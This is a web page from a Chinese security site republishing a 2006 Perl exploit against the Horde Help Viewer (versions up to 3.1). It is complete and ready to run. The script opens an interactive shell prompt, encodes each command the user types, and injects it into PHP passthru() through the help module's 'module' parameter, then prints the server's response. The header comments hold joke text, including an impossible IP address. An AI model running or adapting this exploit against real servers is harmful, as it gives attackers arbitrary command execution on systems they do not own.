首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Horde Help Viewer <= 3.1 Remote Command Execution Exploit
来源:jolascoaga@514.es 作者:jolascoaga 发布时间:2006-04-10  

#!/usr/bin/perl
# Wed Apr 5 21:51:12 CEST 2006 jolascoaga@514.es
#
# Horde help module remote execution
#
# telnet 310.27.901.33.1109 1689 # thanks horatio for the address
# USER paranoia
# PASS total
# SYST
# REST 100
# REST 0
# PWD
# TYPE A
# PASV
# LIST
# CWD 0days
# GET horddy.pl
#
# w0w this damn 0day ftp is so sexy!
#
# GO GO GO !! GO GO GO !! Team fall back!
#
# Example: ./horddy.pl --host=http://www.server.com/horde
#
# Now for your X-box !
#
# Greets:
# - all 514 crew
# - mallorca ppl r0xing.
#
# THIS IS PENE! TIMMY!!! LIVIN' A LIE!
#

use strict;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Request;
use HTTP::Response;
use Getopt::Long;

$| = 1; # mess with the best? don't mess with my buffer

my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$dir, $command);
my $use_ssl = 0;

my $options = GetOptions (
'host=s' => \$host,
'dir=s' => \$dir,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'debug' => \$debug);

&help unless ($host); # please don't try this at home.

$dir = "/horde/" unless($dir);
print "$host - $dir\n";

while () {
print "horddy> "; # lost connection
while(<STDIN>) {
$command=$_;
chomp($command);
last;
}
&send($command);
}

sub buildcmd {# this is a useful comment
my ($cmd) = @_;
# wonderful hacking
$cmd =~ s/ /\%20/gi;
$cmd =~ s/\//\"\.chr\(47\)\.\"/gi;

return $cmd;
}

sub send {
my ($tmp) = @_;
my $ok=0;
my $cmd = buildcmd ($tmp); # this is really magic ^^
my $socket;
LWP::Debug::level('+') if $debug; # but remember this is crap :D

my $ua = new LWP::UserAgent();
$ua->agent("Nozilla/P.N (Just for IDS woring)"); # this is not me :/

my $string = "/$dir/services/help/?show=about&module=;\".passthru(\"$cmd\");'.";

if ($host !~ /^http/) {
$host = sprintf ("http://%s", $host); # CRAP CRAP CRAP
}

my $req = HTTP::Request->new (GET => $host.$string);
$ua->proxy(['http'] => $proxy) if $proxy;
$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

print $req->as_string() if $debug;

my $res = $ua->request($req);
my $html = $res->content();

foreach (split(/\n/,$html)) {
if ((/<h2/) or (/<br \/>/)) { # brum brum conditionals desmitified
last;
}
print "$_\n" if $ok eq "1"; # i don't think this is usefull
if (/<body class=/) {
$ok = 1;
}
}
}

sub help {
print "Syntax: ./$0 --host=url --dir=/horde [options]\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--debug\n";
print "the default directory is /horde\n";
print "\nExample\n";
print "bash# $0 --host=http(s)://www.server.com/\n";
print "\n";
exit(1);
}
exit 0;
# y00000w this is the best part.
# remember mallorca es fonki :D



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·phpMyChat <= 0.14.5 (SYS en
·ADODB < 4.70 (tmssql.php) D
·SQuery versions less than or e
·ADODB < 4.70 (PhpOpenChat 3
·PHPNuke-Clan 3.0.1 Remote File
·XBrite Members <= 1.1 (id)
·AngelineCMS 0.8.1 (installpath
·Linux Kernel 2.6.x sys_timer_c
·Libxine <= 1.14 MPEG Stream
·w3wp remote DoS exploit due to
·Ultr@VNC <= 1.0.1 VNCLog::R
·PHPList <= 2.10.2 GLOBALS[]
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved